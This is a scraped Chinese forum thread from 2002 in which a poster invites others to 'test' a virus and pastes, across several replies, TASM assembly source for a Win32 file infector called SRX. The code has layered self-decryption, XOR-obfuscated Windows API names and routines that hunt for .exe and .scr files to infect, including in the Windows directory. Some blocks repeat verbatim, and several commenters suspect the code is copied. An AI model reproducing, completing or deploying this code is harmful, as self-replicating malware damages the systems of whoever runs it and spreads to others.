21,458
社区成员
发帖
与我相关
我的任务
分享一个奇怪的病毒。。。有胆测试者进
最近写了个程序希望有人测试一下
代码如下::
.586p
.MODEL FLAT, STDCALL
INCLUDE C:\TOOLS\TASM\INCLUDE\WIN32API.INC
INCLUDE C:\TOOLS\TASM\INCLUDE\WINDOWS.INC
EXTRN ExitProcess:PROC
EXTRN MessageBoxA:PROC
.CONST
PAGINAS EQU 50d
KERNEL_9X EQU 0BFF70000h
GPA_HARDCODE EQU 0BFF76DACh
CRLF EQU <0Dh, 0Ah>
TAMA_VIRUS EQU (TERMINA_VIRUS - EMPIEZA_VIRUS)
TAMA_ENCRIPTADO EQU (TERMINA_VIRUS - EMPIEZA_CRYPT)
TAMA_DESENCRIPTOR EQU (EMPIEZA_CRYPT - EMPIEZA_VIRUS)
RDTSC EQU <DW 310Fh>
.DATA
MENSJE DB "xxxxx", CRLF
DB "xxxxx", CRLF, CRLF
DB "xxxxxxxxxx "
DB TAMA_VIRUS / 10000 MOD 10 + 30h
DB TAMA_VIRUS / 1000 MOD 10 + 30h
DB TAMA_VIRUS / 100 MOD 10 + 30h
DB TAMA_VIRUS / 10 MOD 10 + 30h
DB TAMA_VIRUS / 1 MOD 10 + 30h
DB 00h
TITLO DB "-= SRX =-", 00h
.CODE
SRX:
XOR EBP, EBP
JMP EMPIEZA_CRYPT
EMPIEZA_VIRUS LABEL NEAR
CALL @LA_YUCA
@ER_DERTA:
SUB EDX, OFFSET @ER_DERTA
JMP @EL_MONTE
@LA_YUCA:
POP EDX
JMP @ER_DERTA
@EL_MONTE:
XCHG EDX, EBP
MOV AL, 00h
ORG $-1
LLAVEX DB 00h
MOV ECX, TAMA_ENCRIPTADO
LEA ESI, OFFSET [EBP + EMPIEZA_CRYPT]
@@DC:
ADD BYTE PTR [ESI], AL
INC ESI
DEC AL
LOOP @@DC
PUSH OFFSET EMPIEZA_CRYPT
ADD DWORD PTR [ESP], EBP
JMP @Decriptor_2
EMPIEZA_CRYPT LABEL NEAR
JMP @@1
DB " [ALMA] "
@@1:
CALL Desencriptar_Datos
MOV EDI, DWORD PTR [ESP]
CALL Seh_Handler
MOV ESP, DWORD PTR [ESP+8h]
JMP _REVOL
Seh_Handler:
XOR EAX, EAX
PUSH DWORD PTR FS:[EAX]
MOV FS:[EAX], ESP
CALL BUSCA_KERNEL32
MOV DWORD PTR [EBP + KERNEL32], EAX
CALL BUSCA_GPA
MOV DWORD PTR [EBP + GetProcAddress], EAX
LEA EDI, OFFSET [EBP + Tabla_APIs_KERNEL32]
LEA ESI, OFFSET [EBP + CreateFileA]
CALL BUSCA_APIs
INC EAX
JZ _REVOL
LEA EAX, OFFSET [EBP + DIR_ORIGINAL]
PUSH EAX
PUSH MAX_PATH
CALL [EBP + GetCurrentDirectoryA]
OR EAX, EAX
JZ _REVOL
Busca_Primero:
LEA EAX, OFFSET [EBP + Busqueda]
PUSH EAX
LEA EAX, OFFSET [EBP + Todo]
PUSH EAX
CALL [EBP + FindFirstFileA]
MOV DWORD PTR [EBP + SHandle], EAX
INC EAX
JZ Recupera_Directorio
DEC EAX
LaMamada:
LEA EDI, OFFSET [EBP + Busqueda.wfd_szFileName]
XOR EAX, EAX
MOV AL, "."
@@Z:
SCASB
JNZ @@Z
MOV EAX, DWORD PTR [EDI-1h]
OR EAX, 20202020h
CMP EAX, "exe."
JE Infecta_Este_Exe
CMP EAX, "rcs."
JE Infecta_Este_Exe
Busca_Proximo:
LEA EAX, OFFSET [EBP + Busqueda]
PUSH EAX
PUSH DWORD PTR [EBP + SHandle]
CALL [EBP + FindNextFileA]
OR EAX, EAX
JNZ LaMamada
PUSH DWORD PTR [EBP + SHandle]
CALL [EBP + FindClose]
LEA EAX, OFFSET [EBP + Puto_Puto]
PUSH EAX
CALL [EBP + SetCurrentDirectoryA]
OR EAX, EAX
JZ Recupera_Directorio
LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
PUSH EAX
PUSH MAX_PATH
CALL [EBP + GetCurrentDirectoryA]
OR EAX, EAX
JE Termina_Directa
CMP DWORD PTR [EBP + Grueso], EAX
JE Termina_Directa
MOV DWORD PTR [EBP + Grueso], EAX
JMP Busca_Primero
Termina_Directa:
CMP BYTE PTR [EBP + WinDir_Infectado], TRUE
JZ Recupera_Directorio
MOV BYTE PTR [EBP + WinDir_Infectado], TRUE
PUSH MAX_PATH
LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
PUSH EAX
CALL [EBP + GetWindowsDirectoryA]
OR EAX, EAX
JZ Recupera_Directorio
LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
PUSH EAX
CALL [EBP + SetCurrentDirectoryA]
JMP Busca_Primero
Recupera_Directorio:
LEA EAX, OFFSET [EBP + Dir_Original]
CALL [EBP + SetCurrentDirectoryA]
_REVOL:
XOR EAX, EAX
POP DWORD PTR FS:[EAX]
POP ECX
DB 068h ; PUSH
RETORNA DD OFFSET _PrimGen ; Primera Generacion
RET
Infecta_Este_Exe:
LEA EBX, OFFSET [EBP + Busqueda.wfd_szFileName]
CALL Infecta_Exe
JMP Busca_Proximo
代码如下::
.586p
.MODEL FLAT, STDCALL
INCLUDE C:\TOOLS\TASM\INCLUDE\WIN32API.INC
INCLUDE C:\TOOLS\TASM\INCLUDE\WINDOWS.INC
EXTRN ExitProcess:PROC
EXTRN MessageBoxA:PROC
.CONST
PAGINAS EQU 50d
KERNEL_9X EQU 0BFF70000h
GPA_HARDCODE EQU 0BFF76DACh
CRLF EQU <0Dh, 0Ah>
TAMA_VIRUS EQU (TERMINA_VIRUS - EMPIEZA_VIRUS)
TAMA_ENCRIPTADO EQU (TERMINA_VIRUS - EMPIEZA_CRYPT)
TAMA_DESENCRIPTOR EQU (EMPIEZA_CRYPT - EMPIEZA_VIRUS)
RDTSC EQU <DW 310Fh>
.DATA
MENSJE DB "xxxxx", CRLF
DB "xxxxx", CRLF, CRLF
DB "xxxxxxxxxx "
DB TAMA_VIRUS / 10000 MOD 10 + 30h
DB TAMA_VIRUS / 1000 MOD 10 + 30h
DB TAMA_VIRUS / 100 MOD 10 + 30h
DB TAMA_VIRUS / 10 MOD 10 + 30h
DB TAMA_VIRUS / 1 MOD 10 + 30h
DB 00h
TITLO DB "-= SRX =-", 00h
.CODE
SRX:
XOR EBP, EBP
JMP EMPIEZA_CRYPT
EMPIEZA_VIRUS LABEL NEAR
CALL @LA_YUCA
@ER_DERTA:
SUB EDX, OFFSET @ER_DERTA
JMP @EL_MONTE
@LA_YUCA:
POP EDX
JMP @ER_DERTA
@EL_MONTE:
XCHG EDX, EBP
MOV AL, 00h
ORG $-1
LLAVEX DB 00h
MOV ECX, TAMA_ENCRIPTADO
LEA ESI, OFFSET [EBP + EMPIEZA_CRYPT]
@@DC:
ADD BYTE PTR [ESI], AL
INC ESI
DEC AL
LOOP @@DC
PUSH OFFSET EMPIEZA_CRYPT
ADD DWORD PTR [ESP], EBP
JMP @Decriptor_2
EMPIEZA_CRYPT LABEL NEAR
JMP @@1
DB " [ALMA] "
@@1:
CALL Desencriptar_Datos
MOV EDI, DWORD PTR [ESP]
CALL Seh_Handler
MOV ESP, DWORD PTR [ESP+8h]
JMP _REVOL
Seh_Handler:
XOR EAX, EAX
PUSH DWORD PTR FS:[EAX]
MOV FS:[EAX], ESP
CALL BUSCA_KERNEL32
MOV DWORD PTR [EBP + KERNEL32], EAX
CALL BUSCA_GPA
MOV DWORD PTR [EBP + GetProcAddress], EAX
LEA EDI, OFFSET [EBP + Tabla_APIs_KERNEL32]
LEA ESI, OFFSET [EBP + CreateFileA]
CALL BUSCA_APIs
INC EAX
JZ _REVOL
LEA EAX, OFFSET [EBP + DIR_ORIGINAL]
PUSH EAX
PUSH MAX_PATH
CALL [EBP + GetCurrentDirectoryA]
OR EAX, EAX
JZ _REVOL
Busca_Primero:
LEA EAX, OFFSET [EBP + Busqueda]
PUSH EAX
LEA EAX, OFFSET [EBP + Todo]
PUSH EAX
CALL [EBP + FindFirstFileA]
MOV DWORD PTR [EBP + SHandle], EAX
INC EAX
JZ Recupera_Directorio
DEC EAX
LaMamada:
LEA EDI, OFFSET [EBP + Busqueda.wfd_szFileName]
XOR EAX, EAX
MOV AL, "."
@@Z:
SCASB
JNZ @@Z
MOV EAX, DWORD PTR [EDI-1h]
OR EAX, 20202020h
CMP EAX, "exe."
JE Infecta_Este_Exe
CMP EAX, "rcs."
JE Infecta_Este_Exe
Busca_Proximo:
LEA EAX, OFFSET [EBP + Busqueda]
PUSH EAX
PUSH DWORD PTR [EBP + SHandle]
CALL [EBP + FindNextFileA]
OR EAX, EAX
JNZ LaMamada
PUSH DWORD PTR [EBP + SHandle]
CALL [EBP + FindClose]
LEA EAX, OFFSET [EBP + Puto_Puto]
PUSH EAX
CALL [EBP + SetCurrentDirectoryA]
OR EAX, EAX
JZ Recupera_Directorio
LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
PUSH EAX
PUSH MAX_PATH
CALL [EBP + GetCurrentDirectoryA]
OR EAX, EAX
JE Termina_Directa
CMP DWORD PTR [EBP + Grueso], EAX
JE Termina_Directa
MOV DWORD PTR [EBP + Grueso], EAX
JMP Busca_Primero
Termina_Directa:
CMP BYTE PTR [EBP + WinDir_Infectado], TRUE
JZ Recupera_Directorio
MOV BYTE PTR [EBP + WinDir_Infectado], TRUE
PUSH MAX_PATH
LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
PUSH EAX
CALL [EBP + GetWindowsDirectoryA]
OR EAX, EAX
JZ Recupera_Directorio
LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
PUSH EAX
CALL [EBP + SetCurrentDirectoryA]
JMP Busca_Primero
Recupera_Directorio:
LEA EAX, OFFSET [EBP + Dir_Original]
CALL [EBP + SetCurrentDirectoryA]
_REVOL:
XOR EAX, EAX
POP DWORD PTR FS:[EAX]
POP ECX
DB 068h ; PUSH
RETORNA DD OFFSET _PrimGen ; Primera Generacion
RET
Infecta_Este_Exe:
LEA EBX, OFFSET [EBP + Busqueda.wfd_szFileName]
CALL Infecta_Exe
JMP Busca_Proximo
...全文
请发表友善的回复…
发表回复
daehappy 2002-07-07
- 打赏
- 举报
up!gz!
Chice_wxg 2002-07-07
- 打赏
- 举报
倒,我说怎么没看明白注释。
asciiman 2002-07-06
- 打赏
- 举报
French
hehefaint 2002-07-05
- 打赏
- 举报
者为兄弟痴迷于技术,把自幼学的德语(或者法语)记成英语了。可叹可叹
KomsBomb 2002-07-01
- 打赏
- 举报
别蒙人了,有些符号明显不是英语而是欧洲语言。
真不知道你是何居心!!!!!
真不知道你是何居心!!!!!
CodeDemon 2002-07-01
- 打赏
- 举报
重地狱归来还是没有改变吹牛的习惯,哈哈
killhs 2002-07-01
- 打赏
- 举报
!@#$%^&*()
拷回家慢慢看哟!!!
拷回家慢慢看哟!!!
ckhitler 2002-07-01
- 打赏
- 举报
你太厉害了,MUTATION ENGINE也是你写的吧?哈哈.........
ksaiy 2002-06-30
- 打赏
- 举报
不会吧,这个代码我见过好几次了!
你要要我写的可以给你一个,我没有别的意思哦
我可以帮测试的
你要要我写的可以给你一个,我没有别的意思哦
我可以帮测试的
codez 2002-06-30
- 打赏
- 举报
haha,收山这么久,又耐不住寂寞了?
atm2001 2002-06-30
- 打赏
- 举报
习惯用英文作注释了,就没用中文。。。
wowocock 2002-06-29
- 打赏
- 举报
能给写说明吗?比如利用什么原理,利用了哪些技术,你的代码太随意了,不好理解啊。
Hume 2002-06-29
- 打赏
- 举报
是兄弟写的吗?怎么我看注释有些其他语言的痕迹?
zycat2002 2002-06-29
- 打赏
- 举报
DB "(c) xxxxxxxxxxxxxxxx..."
DB 14d DUP (00h)
@Decriptor_2:
LEA ESI, OFFSET [EBP + EMPIEZA_CRYPT]
MOV ECX, (@Decriptor_2 - EMPIEZA_CRYPT) / 12
@DC2:
XOR DWORD PTR [ESI], 12345678h
ORG $-4
LLAVE2A DD 00000000h
ADD ESI, 04h
SUB DWORD PTR [ESI], 12345678h
ORG $-4
LLAVE2B DD 00000000h
ADD ESI, 04h
ADD DWORD PTR [ESI], 12345678h
ORG $-4
LLAVE2C DD 00000000h
ADD ESI, 04h
LOOP @DC2
RET
DB 12d DUP (90h)
TAMA_DEC2 EQU $-@Decriptor_2
TERMINA_VIRUS LABEL NEAR
_PrimGen:
XOR EAX, EAX
PUSH EAX
PUSH OFFSET Titlo
PUSH OFFSET Mensje
PUSH EAX
CALL MessageBoxA
PUSH 0
CALL ExitProcess
END SRX
DB 14d DUP (00h)
@Decriptor_2:
LEA ESI, OFFSET [EBP + EMPIEZA_CRYPT]
MOV ECX, (@Decriptor_2 - EMPIEZA_CRYPT) / 12
@DC2:
XOR DWORD PTR [ESI], 12345678h
ORG $-4
LLAVE2A DD 00000000h
ADD ESI, 04h
SUB DWORD PTR [ESI], 12345678h
ORG $-4
LLAVE2B DD 00000000h
ADD ESI, 04h
ADD DWORD PTR [ESI], 12345678h
ORG $-4
LLAVE2C DD 00000000h
ADD ESI, 04h
LOOP @DC2
RET
DB 12d DUP (90h)
TAMA_DEC2 EQU $-@Decriptor_2
TERMINA_VIRUS LABEL NEAR
_PrimGen:
XOR EAX, EAX
PUSH EAX
PUSH OFFSET Titlo
PUSH OFFSET Mensje
PUSH EAX
CALL MessageBoxA
PUSH 0
CALL ExitProcess
END SRX
zycat2002 2002-06-29
- 打赏
- 举报
DB "L" XOR 4Eh
DB "o" XOR 4Eh
DB "a" XOR 4Eh
DB "d" XOR 4Eh
DB "L" XOR 4Eh
DB "i" XOR 4Eh
DB "b" XOR 4Eh
DB "r" XOR 4Eh
DB "a" XOR 4Eh
DB "r" XOR 4Eh
DB "y" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
DB "V" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "t" XOR 4Eh
DB "u" XOR 4Eh
DB "a" XOR 4Eh
DB "l" XOR 4Eh
DB "A" XOR 4Eh
DB "l" XOR 4Eh
DB "l" XOR 4Eh
DB "o" XOR 4Eh
DB "c" XOR 4Eh
DB 4Eh
DB "V" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "t" XOR 4Eh
DB "u" XOR 4Eh
DB "a" XOR 4Eh
DB "l" XOR 4Eh
DB "F" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "T" XOR 4Eh
DB "i" XOR 4Eh
DB "c" XOR 4Eh
DB "k" XOR 4Eh
DB "C" XOR 4Eh
DB "o" XOR 4Eh
DB "u" XOR 4Eh
DB "n" XOR 4Eh
DB "t" XOR 4Eh
DB 4Eh
DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "W" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "o" XOR 4Eh
DB "w" XOR 4Eh
DB "s" XOR 4Eh
DB "D" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "c" XOR 4Eh
DB "t" XOR 4Eh
DB "o" XOR 4Eh
DB "r" XOR 4Eh
DB "y" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
DB 0FFh XOR 4Eh ; HO HO HO
L_CRIPTA2 EQU $-CRIPTA2
DB "o" XOR 4Eh
DB "a" XOR 4Eh
DB "d" XOR 4Eh
DB "L" XOR 4Eh
DB "i" XOR 4Eh
DB "b" XOR 4Eh
DB "r" XOR 4Eh
DB "a" XOR 4Eh
DB "r" XOR 4Eh
DB "y" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
DB "V" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "t" XOR 4Eh
DB "u" XOR 4Eh
DB "a" XOR 4Eh
DB "l" XOR 4Eh
DB "A" XOR 4Eh
DB "l" XOR 4Eh
DB "l" XOR 4Eh
DB "o" XOR 4Eh
DB "c" XOR 4Eh
DB 4Eh
DB "V" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "t" XOR 4Eh
DB "u" XOR 4Eh
DB "a" XOR 4Eh
DB "l" XOR 4Eh
DB "F" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "T" XOR 4Eh
DB "i" XOR 4Eh
DB "c" XOR 4Eh
DB "k" XOR 4Eh
DB "C" XOR 4Eh
DB "o" XOR 4Eh
DB "u" XOR 4Eh
DB "n" XOR 4Eh
DB "t" XOR 4Eh
DB 4Eh
DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "W" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "o" XOR 4Eh
DB "w" XOR 4Eh
DB "s" XOR 4Eh
DB "D" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "c" XOR 4Eh
DB "t" XOR 4Eh
DB "o" XOR 4Eh
DB "r" XOR 4Eh
DB "y" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
DB 0FFh XOR 4Eh ; HO HO HO
L_CRIPTA2 EQU $-CRIPTA2
zycat2002 2002-06-29
- 打赏
- 举报
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "N" XOR 4Eh
DB "e" XOR 4Eh
DB "x" XOR 4Eh
DB "t" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "C" XOR 4Eh
DB "l" XOR 4Eh
DB "o" XOR 4Eh
DB "s" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "S" XOR 4Eh
DB "i" XOR 4Eh
DB "z" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
DB "S" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "P" XOR 4Eh
DB "o" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "t" XOR 4Eh
DB "e" XOR 4Eh
DB "r" XOR 4Eh
DB 4Eh
DB "S" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "E" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "O" XOR 4Eh
DB "f" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "C" XOR 4Eh
DB "u" XOR 4Eh
DB "r" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "n" XOR 4Eh
DB "t" XOR 4Eh
DB "D" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "c" XOR 4Eh
DB "t" XOR 4Eh
DB "o" XOR 4Eh
DB "r" XOR 4Eh
DB "y" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
DB "S" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "C" XOR 4Eh
DB "u" XOR 4Eh
DB "r" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "n" XOR 4Eh
DB "t" XOR 4Eh
DB "D" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "c" XOR 4Eh
DB "t" XOR 4Eh
DB "o" XOR 4Eh
DB "r" XOR 4Eh
DB "y" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "S" XOR 4Eh
DB "y" XOR 4Eh
DB "s" XOR 4Eh
DB "t" XOR 4Eh
DB "e" XOR 4Eh
DB "m" XOR 4Eh
DB "T" XOR 4Eh
DB "i" XOR 4Eh
DB "m" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "N" XOR 4Eh
DB "e" XOR 4Eh
DB "x" XOR 4Eh
DB "t" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "C" XOR 4Eh
DB "l" XOR 4Eh
DB "o" XOR 4Eh
DB "s" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "S" XOR 4Eh
DB "i" XOR 4Eh
DB "z" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
DB "S" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "P" XOR 4Eh
DB "o" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "t" XOR 4Eh
DB "e" XOR 4Eh
DB "r" XOR 4Eh
DB 4Eh
DB "S" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "E" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "O" XOR 4Eh
DB "f" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "C" XOR 4Eh
DB "u" XOR 4Eh
DB "r" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "n" XOR 4Eh
DB "t" XOR 4Eh
DB "D" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "c" XOR 4Eh
DB "t" XOR 4Eh
DB "o" XOR 4Eh
DB "r" XOR 4Eh
DB "y" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
DB "S" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "C" XOR 4Eh
DB "u" XOR 4Eh
DB "r" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "n" XOR 4Eh
DB "t" XOR 4Eh
DB "D" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "c" XOR 4Eh
DB "t" XOR 4Eh
DB "o" XOR 4Eh
DB "r" XOR 4Eh
DB "y" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "S" XOR 4Eh
DB "y" XOR 4Eh
DB "s" XOR 4Eh
DB "t" XOR 4Eh
DB "e" XOR 4Eh
DB "m" XOR 4Eh
DB "T" XOR 4Eh
DB "i" XOR 4Eh
DB "m" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
atm2001 2002-06-29
- 打赏
- 举报
CRIPTA2 LABEL NEAR
Kernel32 DD 4E4E4E4Eh
GetProcAddress DD 4E4E4E4Eh
Puto_Puto DB "." XOR 4Eh
DB "." XOR 4Eh
DB 4Eh
Todo DB "*" XOR 4Eh
DB "." XOR 4Eh
DB "?" XOR 4Eh
DB "?" XOR 4Eh
DB "?" XOR 4Eh
DB 4Eh
SHandle DD 4E4E4E4Eh
Grueso DD 4E4E4E4Eh
Dir_Original DB MAX_PATH DUP (4Eh)
CreateFileA DD 4E4E4E4Eh
CreateFileMappingA DD 4E4E4E4Eh
MapViewOfFile DD 4E4E4E4Eh
UnmapViewOfFile DD 4E4E4E4Eh
CloseHandle DD 4E4E4E4Eh
FindFirstFileA DD 4E4E4E4Eh
FindNextFileA DD 4E4E4E4Eh
FindClose DD 4E4E4E4Eh
GetFileSize DD 4E4E4E4Eh
SetFilePointer DD 4E4E4E4Eh
SetEndOfFile DD 4E4E4E4Eh
GetCurrentDirectoryA DD 4E4E4E4Eh
SetCurrentDirectoryA DD 4E4E4E4Eh
GetSystemTime DD 4E4E4E4Eh
LoadLibraryA DD 4E4E4E4Eh
VirtualAlloc DD 4E4E4E4Eh
VirtualFree DD 4E4E4E4Eh
GetTickCount DD 4E4E4E4Eh
GetWindowsDirectoryA DD 4E4E4E4Eh
WinDir_Infectado DB 4Eh
MEMORIA DD 4E4E4E4Eh
FHANDLE DD 4E4E4E4Eh
MHANDLE DD 4E4E4E4Eh
BASEMAP DD 4E4E4E4Eh
TAMA DD 4E4E4E4Eh
SRAWDATA DD 4E4E4E4Eh
EP_VIEJO DD 4E4E4E4Eh
EXPORTS DD 4E4E4E4Eh
GPA DB "G" XOR 4Eh
DB "e" XOR 4Eh
DB "t" XOR 4Eh
DB "P" XOR 4Eh
DB "r" XOR 4Eh
DB "o" XOR 4Eh
DB "c" XOR 4Eh
DB "A" XOR 4Eh
DB "d" XOR 4Eh
DB "d" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "s" XOR 4Eh
DB "s" XOR 4Eh
DB 4Eh
Largo_GPA EQU $-GPA
Busqueda DB SIZEOF_WIN32_FIND_DATA DUP (4Eh)
Tabla_APIs_KERNEL32 DB "C" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "a" XOR 4Eh
DB "t" XOR 4Eh
DB "e" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
DB "C" XOR 4Eh
DB "r" XOR 4Eh
DB "e" XOR 4Eh
DB "a" XOR 4Eh
DB "t" XOR 4Eh
DB "e" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "M" XOR 4Eh
DB "a" XOR 4Eh
DB "p" XOR 4Eh
DB "p" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "g" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
DB "M" XOR 4Eh
DB "a" XOR 4Eh
DB "p" XOR 4Eh
DB "V" XOR 4Eh
DB "i" XOR 4Eh
DB "e" XOR 4Eh
DB "w" XOR 4Eh
DB "O" XOR 4Eh
DB "f" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
DB "U" XOR 4Eh
DB "n" XOR 4Eh
DB "m" XOR 4Eh
DB "a" XOR 4Eh
DB "p" XOR 4Eh
DB "V" XOR 4Eh
DB "i" XOR 4Eh
DB "e" XOR 4Eh
DB "w" XOR 4Eh
DB "O" XOR 4Eh
DB "f" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
DB "C" XOR 4Eh
DB "l" XOR 4Eh
DB "o" XOR 4Eh
DB "s" XOR 4Eh
DB "e" XOR 4Eh
DB "H" XOR 4Eh
DB "a" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "n" XOR 4Eh
DB "d" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "r" XOR 4Eh
DB "s" XOR 4Eh
DB "t" XOR 4Eh
DB "F" XOR 4Eh
DB "i" XOR 4Eh
DB "l" XOR 4Eh
DB "e" XOR 4Eh
DB "A" XOR 4Eh
DB 4Eh
Kernel32 DD 4E4E4E4Eh
GetProcAddress DD 4E4E4E4Eh
Puto_Puto DB "." XOR 4Eh
DB "." XOR 4Eh
DB 4Eh
Todo DB "*" XOR 4Eh
DB "." XOR 4Eh
DB "?" XOR 4Eh
DB "?" XOR 4Eh
DB "?" XOR 4Eh
DB 4Eh
SHandle DD 4E4E4E4Eh
Grueso DD 4E4E4E4Eh
Dir_Original DB MAX_PATH DUP (4Eh)
CreateFileA DD 4E4E4E4Eh
CreateFileMappingA DD 4E4E4E4Eh
MapViewOfFile DD 4E4E4E4Eh
UnmapViewOfFile DD 4E4E4E4Eh
CloseHandle DD 4E4E4E4Eh
FindFirstFileA DD 4E4E4E4Eh
FindNextFileA DD 4E4E4E4Eh
FindClose DD 4E4E4E4Eh
GetFileSize DD 4E4E4E4Eh
SetFilePointer DD 4E4E4E4Eh
SetEndOfFile DD 4E4E4E4Eh
GetCurrentDirectoryA DD 4E4E4E4Eh
SetCurrentDirectoryA DD 4E4E4E4Eh
GetSystemTime DD 4E4E4E4Eh
LoadLibraryA DD 4E4E4E4Eh
VirtualAlloc DD 4E4E4E4Eh
VirtualFree DD 4E4E4E4Eh
